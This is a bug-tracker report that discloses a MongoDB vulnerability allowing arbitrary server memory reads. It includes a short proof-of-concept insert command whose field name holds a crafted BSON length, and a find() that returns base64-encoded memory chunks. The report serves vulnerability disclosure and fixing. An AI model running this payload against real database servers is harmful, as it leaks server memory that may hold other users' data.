-
Type: Bug
-
Resolution: Done
-
Priority: Major - P3
-
Affects Version/s: None
-
Component/s: None
-
None
-
ALL
The specialists of the Positive Research center have detected "Server arbitrary memory reading" vulnerability in MongoDB application.
Cause of incorrect execution of BSON-document length in column name in the insert command it’s possible to insert a record which can contain a base64-encrypted server memory chunks.
Example of use:
Suppose you have a table "dropme" with write permission.
Execute the following command with a result:
> db.dropme.insert(
{"\x16\x00\x00\x00\x05hello\x00\x010\x00\x00\x00world\x00\x00" : "world"})
> db.dropme.find()
After base64-code decryption you can get bytes from random server memory chunks.
Credits
The vulnerability was discovered by Mikhail Firstov, Positive Research Center (Positive Technologies Company)
- is duplicated by
-
SERVER-7691 Java driver is capable of crashing mongod with a simple insert
- Closed
-
SERVER-8272 Add command line option for "noObjcheck"
- Closed
- is related to
-
SERVER-6519 MongoDB Crash Under High Load
- Closed